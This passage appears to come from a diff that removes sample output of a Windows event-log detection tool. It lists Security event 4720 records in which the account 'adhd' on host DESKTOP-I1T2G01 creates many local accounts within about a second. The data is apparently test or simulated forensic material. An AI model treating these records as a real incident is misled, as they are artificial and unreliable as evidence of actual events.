-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ashley</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4207</recordid>
-            <time>2020-06-11 22:04:53.482231100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.4822311Z'/&gt;&lt;EventRecordID&gt;4207&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ronald&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1027&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ronald&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ronald</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4201</recordid>
-            <time>2020-06-11 22:04:53.392886000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.3928860Z'/&gt;&lt;EventRecordID&gt;4201&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Steven&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1026&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Steven&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Steven</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4195</recordid>
-            <time>2020-06-11 22:04:53.310005100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.3100051Z'/&gt;&lt;EventRecordID&gt;4195&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jacob&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1025&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jacob&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jacob</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4189</recordid>
-            <time>2020-06-11 22:04:53.229727900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.2297279Z'/&gt;&lt;EventRecordID&gt;4189&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Howard&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1024&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Howard&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Howard</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4183</recordid>
-            <time>2020-06-11 22:04:53.153835300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.1538353Z'/&gt;&lt;EventRecordID&gt;4183&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Teresa&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1023&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Teresa&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Teresa</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4177</recordid>
-            <time>2020-06-11 22:04:53.39583500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.0395835Z'/&gt;&lt;EventRecordID&gt;4177&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Nicholas&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1022&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Nicholas&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Nicholas</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4171</recordid>
-            <time>2020-06-11 22:04:52.954875300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.9548753Z'/&gt;&lt;EventRecordID&gt;4171&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jennifer&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1021&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jennifer&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jennifer</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4165</recordid>
-            <time>2020-06-11 22:04:52.871498100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.8714981Z'/&gt;&lt;EventRecordID&gt;4165&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Deborah&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1020&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Deborah&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Deborah</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4159</recordid>
-            <time>2020-06-11 22:04:52.780970200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.7809702Z'/&gt;&lt;EventRecordID&gt;4159&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Amber&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1019&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Amber&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

